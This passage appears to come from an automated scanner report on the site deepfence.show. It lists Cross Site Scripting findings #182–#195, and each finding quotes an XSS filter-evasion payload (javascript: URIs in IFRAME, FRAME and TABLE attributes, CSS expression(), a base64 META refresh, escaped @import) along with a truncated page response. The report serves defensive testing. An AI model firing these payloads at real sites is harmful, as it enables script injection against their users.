href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #182\nScan Cross Site Scripting\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;\nbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #183\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://\n;URL=javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #184\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #185\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"><\n/FRAMESET>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #186\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <TABLE BACKGROUND=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io not be echoed back in the response\nCWE-ID CWE-79\nIssue Number #187\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\n\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #188\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <DIV STYLE=\"background-image: url(javascript:alert('\nXSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #189\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\\n0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\\n006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\\n0029\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #190Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <DIV STYLE=\"background-image: url(&#1;javascript:\nalert('XSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #191\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <DIV STYLE=\"width: expression(alert('XSS'));\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #192\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #193\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #194\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <XSS STYLE=\"xss:expression(alert('XSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #195\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:&#101;x&#x2F;*\nXSS*//*/*/pression(alert(\"XSS\"))'>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 